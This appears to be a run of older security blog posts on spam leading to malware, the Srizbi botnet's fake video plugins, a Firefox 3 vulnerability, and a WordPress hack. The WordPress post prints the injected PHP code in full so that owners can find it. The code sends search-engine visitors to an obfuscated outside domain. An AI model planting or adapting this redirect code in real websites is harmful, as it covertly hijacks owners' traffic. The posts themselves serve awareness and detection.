Trend Micro is writing about spam with random subjects not relevant to the actual content in the email. The content in the spam emails in this case are usually on line of text and a link that ends with r.html. The dangerous part of all these kinds of spam is that if you click on the link a file called video.exe will try to install on you computer. The file is actually a malware that will send spam via your computer.

The subjects you should look out for are:

• Hiliary admits past failures
• Star Trek star dies at age 79
• Find out about Harry Potter’s last novel
• Turner Empire poised for bankruptcy file
• Obama suffers setback in polls due to sex secrets
• Nokia unveils revolutionary new phone design
• Ford unveils latest 2 door design hatch
• Italy knocked out of Euro 2008
• Britney found hanged in locker room

Trend Micro writes:

The spam-malware tandem is a common tactic, and most spam does lead to malware.

So the advice here is to look out for spam and never click on links in spam!!!!

Read more at TrendLabs.

Popularity: 7% [?]

One of the largest bot networks today is Srizbi which will turn your computer into a zombie that wil flood Internet with spam. According to Marshal Trace the network has increased it’s spamming from about 3% of all spam to 9.9%.

The thing with this network is that it’s tricking it’s victims to install the bad software by requesting a special plugin to view a video for example. Another example is an email looking like someone want you to check out a page at Classmates.com, but when you visit that page you’re requested to install a special browser plugin to view the entire message. Therefore you should stay alert for anything that require other plugins then the plugins from known developers like Sun and Adobe.

Popularity: 7% [?]

Version 3 has just been released and been downloaded so many times that it’s a world record and already a bug has been found in Firefox .It’s not easy to build a web browser so I guess these things happen all the time (just think of IE).

The vulnerability found is also available in version 2 of the web browser and was discovered of TippingPoint’s Zero Day Initiative, an organisation specialized in discovering and providing software vulnerability information.

Window Snyder, chief security officer of Mozilla, says:

At Mozilla we appreciate any report of security issues because that is how we make the browser stronger and more secure. The best way to keep Firefox users safe is to report the issues directly to Mozilla as TippingPoint has chosen to, and to wait to release details until a fix is available.

More information will hopefully soon be published at the Mozilla Security blog.

Popularity: 6% [?]

I’ve seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting about a Wordpress hack that will “steal” your search engine traffic . As always it’s important to upgrade your Wordpress (or any software for that case) installation when a new security fix is released. Luckily Wordpress is pretty safe so you don’t have to upgrade too often and it’s really easy to upgrade your installation even if you got a few plugins

This hack is hard for you (the blog owner) to detect since it’s just taking your search engine traffic and will never “steal” any visitors that have accessed your blog before. According to ocaoimh.ie you should look for this code in your .php files (for example wp-blog-header.php):

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol", "cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

This hack is hard to detect since you the blog owner will see your own site/blog (you’re not finding your own blog via a search engine every time you post a new post right?).

Solution: Search your files for weird code, update Wordpress to the latest version and don’t forget to use hard to guess passwords.

Popularity: 6% [?]